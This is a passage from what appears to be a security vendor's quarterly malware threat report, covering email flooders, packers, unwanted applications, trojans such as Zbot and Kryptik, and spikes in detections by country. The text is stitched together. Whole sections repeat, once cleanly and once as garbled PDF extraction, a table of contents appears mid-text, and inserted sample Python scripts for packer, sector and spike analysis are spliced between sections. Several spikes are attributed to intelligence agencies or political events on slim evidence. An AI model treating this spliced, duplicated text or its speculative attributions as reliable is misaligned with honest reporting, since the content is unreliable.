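    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    table, body, raw_ptr = bytearray(), bytearray(), hdr_end
    for name, payload in sections:
        raw_size = -(-len(payload) // align) * align
        table += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(payload), 0x1000, raw_size, raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += payload.ljust(raw_size, b"\0")
        raw_ptr += raw_size
    head = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return head.ljust(hdr_end, b"\0") + bytes(body)

def pseudo_random(n: int) -> bytes:
    """Deterministic SHA-256 chain standing in for a compressed or encrypted payload."""
    out, block = bytearray(), b"constructed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])

CODE_LIKE = bytes(range(64)) * 64        # 64 distinct symbols: entropy exactly 6.0
PACKED_PE = build_pe([(b"UPX0", b""), (b"UPX1", pseudo_random(4096))])
CLEAN_PE = build_pe([(b".text", CODE_LIKE), (b".data", bytes(4096))])

if __name__ == "__main__":
    for tag, img in (("packed", PACKED_PE), ("clean", CLEAN_PE)):
        print(tag, assess(img))
```

Entropy alone misclassifies legitimately compressed resources and installers, so in practice the section-name and entropy findings are triage signals to be confirmed by unpacking, not a verdict on their own.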

5.3.3 Email Flooder

Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, a form of denial-of-service (DoS) attack.

The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.

The primary country where Comodo detected this malicious behavior was Germany.

And this timeline shows that, while the number of Palevo detections was not high, it was still a persistent threat in Germany.

5.3.4 Virtual Tools

Virtual Tools are programs that can modify or alter malicious files to avoid detection.

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.

The top two countries for Virtual Tools detections were Germany and the US.

This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.

5.3.5 Jokes

"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.

Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.

Germany (de) and the US were the top two countries of detection for Joke malware.

In this timeline you can see that this malware type is not numerous, but still something to be aware of.

5.4 Low Threat Malware: Applications

In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.

5.4.1 Applications

Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.

In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.

And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.

5.4.2 Unwanted Applications

The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.

The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".

As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.

And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.

5.4.3 Unsafe Applications

Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.

The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.

This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.

This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.

6 Vertical analysis

In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.

Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not only in one but in multiple verticals, clearly making them a current strategic threat across the world.

First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites, and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.

In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.

7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.

7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.

7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.

7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.

7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.

7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.

7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.

7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".

7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.

8 Conclusions

In Q2, Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in delivery method, sophisticated in persistence, and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers, and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy, policies and postures.


About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.

The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence, and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners, and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.

  • 1 Executive summary
    • 11 Overview
    • 12 New Trends
      • 121 Trojans jumped to the top of the malware list
      • 122 Cryptominers evolved into multifunctional malware
      • 123 Android malware skyrocketed in variety
      • 124 Geopolitical intelligence
          • 2 Trojans going on the offensive to hunt for confidential data
            • 21 The Most Widespread Trojan
            • 22 PowerShell-based attack with Emotet
            • 23 Flawed Ammyy RAT attack based on legitimate software
            • 24 The growth of Flawed Ammyy attacks for Q2
            • 25 Ammyy Admin dissemination around the world for Q2
              • 3 Cryptominer Evolution
                • Going Fileless Killing Competitors Crashing Systems
                • 31 BadShell attacks enterprises
                • 32 WinstarNssmMiner a system killer
                • 33 CoinMiner kills rivals
                • 34 CoinHive changes its skin
                • 35 Cryptocurrency clipboard hijacker intercepts transfers
                  • 4 Android Devices Under Siege
                    • 41 Spying Stealing Mining
                      • 411 KevDroid
                      • 412 Zoo Park
                      • 413 MikeSpy
                      • 414 Xloader
                      • 415 Stalker Spy
                      • 416 Mystery Bot
                      • 417 FakeSpy
                      • 418 RedAlert
                      • 419 Hero Rat
                      • 4110 Sonvpay
                      • 4111 CoinHive
                        • 42 Android Malware Catalogued by Month
                          • 421 April 2018
                          • 422 May 2018
                          • 423 June 2018
                              • 5 Malware in Q2 2018 The Big Picture
                                • 51 Strategic Threat Computer Worms
                                  • 511 Generic Worms
                                  • 512 Net Worms
                                  • 513 Email Worms
                                  • 514 p2p Worms
                                  • 515 IM Worms
                                    • 52 High Threat Malware
                                      • 521 Backdoors
                                      • 522 Viruses
                                      • 523 Trojans
                                      • 524 Exploits
                                        • 53 Medium Threat Malware
                                          • 531 Constructor
                                          • 532 Packers
                                          • 533 Email Flooder
                                          • 534 Virtual Tools
                                          • 535 Jokes
                                            • 54 Low Threat Malware Applications
                                              • 541 Applications
                                              • 542 Unwanted Applications
                                              • 543 Unsafe Applications
                                                  • 6 Vertical analysis
                                                  • 7 Geopolitical Intelligence
                                                    • 71 USA
                                                    • 72 China
                                                    • 73 South Korea
                                                    • 74 North Korea
                                                    • 75 Armenia
                                                    • 76 Belarus
                                                    • 77 Iraq
                                                    • 78 Ukraine
                                                    • 79 Croatia
                                                    • 710 Finland Russia USA
                                                      • 8 Conclusions

Global Threat Report Q2 2018 Edition

Page 54 of 73

533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack

The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders

The primary country where Comodo detected this malicious behavior was in Germany

And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany

Global Threat Report Q2 2018 Edition

Page 55 of 73

534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection

The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile

The top two countries for Virtual Tools detections were Germany and the US

This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018

Global Threat Report Q2 2018 Edition

Page 56 of 73

535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time

Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense

Germany (de) and the US were the top two countries of detection for Joke malware

In this timeline you can see that this malware type is not numerous ndash but still something to be aware of

Global Threat Report Q2 2018 Edition

Page 57 of 73

54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications

Global Threat Report Q2 2018 Edition

Page 58 of 73

541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location

In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings

The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications

And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America

Global Threat Report Q2 2018 Edition

Page 59 of 73

542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more

The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo

As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018

And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US

Global Threat Report Q2 2018 Edition

Page 60 of 73

543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients

The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently

This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively

This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018

Global Threat Report Q2 2018 Edition

Page 61 of 73

6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type

Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world

Global Threat Report Q2 2018 Edition

Page 62 of 73

First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers, and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.

Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation. And over a decade later, Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.

Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a virus and needs to be cleaned.

In conclusion: first, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks; second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
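The profile the infographic describes (a per-vertical distribution over the four malware types, the top type, and the #1 family within it) is a small aggregation; the following added example, which is not Comodo's code or data, builds it from constructed detection records and then lists the families that top more than one vertical, as the text does for Kryptik and Zbot. The vertical names, and every family other than Kryptik, Zbot, Generic, and Elex, are placeholders.

```python
"""Per-vertical malware profiling of the kind the vertical analysis describes.
Added example, not Comodo's code or data: the detection records are constructed,
the vertical names are assumptions, and family names other than Kryptik, Zbot,
Generic and Elex are placeholders."""
from collections import Counter, defaultdict

# The four malware types the infographic covers.
MALWARE_TYPES = ("Backdoor", "Trojan", "Virus", "Worm")

# Constructed detection records: (vertical, malware_type, family).
SAMPLE_DETECTIONS = [
    ("government", "Trojan", "Zbot"),
    ("government", "Trojan", "Zbot"),
    ("government", "Trojan", "Kryptik"),
    ("government", "Worm", "Generic"),
    ("transportation", "Trojan", "Zbot"),
    ("transportation", "Trojan", "Zbot"),
    ("transportation", "Virus", "PlaceholderVirus"),
    ("healthcare", "Trojan", "Kryptik"),
    ("healthcare", "Trojan", "Kryptik"),
    ("healthcare", "Trojan", "Kryptik"),
    ("healthcare", "Virus", "PlaceholderVirus"),
    ("retail", "Trojan", "Kryptik"),
    ("retail", "Trojan", "Kryptik"),
    ("retail", "Application", "Elex"),          # outside the four types: ignored
    ("energy", "Backdoor", "PlaceholderBackdoor"),
    ("energy", "Backdoor", "PlaceholderBackdoor"),
    ("energy", "Trojan", "Kryptik"),
    ("energy", "Trojan", "Kryptik"),            # 2 vs 2: a tie on the top type
]


def vertical_profile(detections, malware_types=MALWARE_TYPES):
    """Return {vertical: {"distribution", "top_type", "top_family"}}.

    distribution: detections per malware type, zero-filled so every vertical
                  reports all four types even when one was never seen
    top_type:     the most detected type; ties go to the type listed first in
                  malware_types, so the answer is deterministic
    top_family:   the #1 family within the top type (alphabetical on ties)
    """
    per_vertical = defaultdict(lambda: {t: Counter() for t in malware_types})
    for vertical, mtype, family in detections:
        if mtype not in malware_types:
            continue
        per_vertical[vertical][mtype][family] += 1

    profile = {}
    for vertical, type_counts in per_vertical.items():
        distribution = {t: sum(type_counts[t].values()) for t in malware_types}
        top_type = max(malware_types, key=distribution.__getitem__)
        families = type_counts[top_type]          # non-empty: top_type has >= 1 hit
        top_family = max(sorted(families), key=families.__getitem__)
        profile[vertical] = {"distribution": distribution,
                             "top_type": top_type, "top_family": top_family}
    return profile


def strategic_families(profile, min_verticals=2):
    """Families that are #1 in at least min_verticals verticals: the cross-sector
    view the report uses to call Kryptik and Zbot strategic threats."""
    hits = defaultdict(list)
    for vertical, entry in profile.items():
        hits[entry["top_family"]].append(vertical)
    return {fam: sorted(vs) for fam, vs in hits.items() if len(vs) >= min_verticals}


if __name__ == "__main__":
    prof = vertical_profile(SAMPLE_DETECTIONS)
    for vertical in sorted(prof):
        e = prof[vertical]
        print(f"{vertical:15} {e['distribution']}  top: {e['top_type']}/{e['top_family']}")
    print("strategic:", strategic_families(prof))
```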


7 Geopolitical Intelligence

7.1 USA

This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military, and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking – commonly called cyber espionage – which today takes place on a far greater scale than the public realizes.

7.2 China

This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services – both foreign and domestic – were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.


7.3 South Korea

National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies, and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.


7.4 North Korea

The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone, or some institution, was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.


7.5 Armenia

All major geopolitical events today are bathed in malware. The reason is that all activities – from social activities to business, politics, or national security affairs – are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information – or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.


7.6 Belarus

A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny, or manipulate sensitive information related to the new legislation and its impact on Belarusian society.


7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April, Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July, Iraq was preparing for a vote recount following accusations of impropriety at the polls.


7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detection – and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.


7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".


7.10 Finland, Russia, USA

Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike – by far – occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa – precisely where the summit was scheduled to take place.
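Every timeline in this section rests on the same step: find the days whose detection count stands far above the usual level, then characterize what was detected and where. The following added example (not Comodo's code or data) runs that step over constructed log lines, using a median daily baseline and the ten-times-usual threshold from the North Korea section; the country codes, region names, and the virus family are placeholders.

```python
"""Spike detection over a daily detection timeline, with a breakdown of each
spike day by malware type and region. Added example, not Comodo's code: the
log lines are constructed, and country codes and region names are placeholders."""
from collections import Counter
from datetime import date, timedelta
from statistics import median


def make_sample_log():
    """Constructed log lines, one detection per line: date,country,region,type,family.
    A quiet baseline of two detections a day through April 2018 for country XX,
    plus a burst of 28 extra detections on April 16 concentrated in one region,
    and a single stray detection for country YY."""
    lines = ["# date,country,region,type,family"]
    day, last = date(2018, 4, 1), date(2018, 4, 30)
    while day <= last:
        lines.append(f"{day},XX,region-a,Trojan,Kryptik")
        lines.append(f"{day},XX,region-b,Worm,Generic")
        if day == date(2018, 4, 16):
            lines.extend([f"{day},XX,region-b,Virus,PlaceholderVirus"] * 28)
        day += timedelta(days=1)
    lines.append("2018-04-16,YY,region-c,Trojan,Zbot")
    return lines


def parse_log(lines):
    """Parse CSV lines into records; blank lines and '#' comments are skipped."""
    records = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        d, country, region, mtype, family = line.split(",")
        records.append({"date": date.fromisoformat(d), "country": country,
                        "region": region, "type": mtype, "family": family})
    return records


def daily_counts(records, country, start, end):
    """Detections per day for one country over [start, end], zero-filled so that
    days without telemetry still count toward the baseline."""
    per_day = Counter(r["date"] for r in records if r["country"] == country)
    series, day = [], start
    while day <= end:
        series.append((day, per_day.get(day, 0)))
        day += timedelta(days=1)
    return series


def find_spikes(records, country, start_iso, end_iso, ratio=10.0):
    """Return the days whose count is at least `ratio` times the median daily
    count, each with the share of its top malware type and top region.

    The median is the 'usual' level because a handful of spikes cannot drag it
    up the way a mean would. A zero median is floored to 1 so that one detection
    in an otherwise silent country is not reported as an infinite spike."""
    start, end = date.fromisoformat(start_iso), date.fromisoformat(end_iso)
    series = daily_counts(records, country, start, end)
    baseline = max(median([c for _, c in series]), 1)
    spikes = []
    for day, count in series:
        if count < ratio * baseline:
            continue
        day_records = [r for r in records
                       if r["country"] == country and r["date"] == day]
        top_type, type_n = Counter(r["type"] for r in day_records).most_common(1)[0]
        top_region, region_n = Counter(r["region"] for r in day_records).most_common(1)[0]
        spikes.append({"date": day.isoformat(), "count": count,
                       "ratio": count / baseline,
                       "top_type": top_type, "top_type_share": type_n / count,
                       "top_region": top_region, "top_region_share": region_n / count})
    return spikes


if __name__ == "__main__":
    recs = parse_log(make_sample_log())
    for s in find_spikes(recs, "XX", "2018-04-01", "2018-04-30"):
        print(f"{s['date']}: {s['count']} detections ({s['ratio']:.1f}x usual), "
              f"{s['top_type_share']:.0%} {s['top_type']}, "
              f"{s['top_region_share']:.0%} in {s['top_region']}")
```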


8 Conclusions

In Q2, Comodo Cybersecurity observed several new, significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.

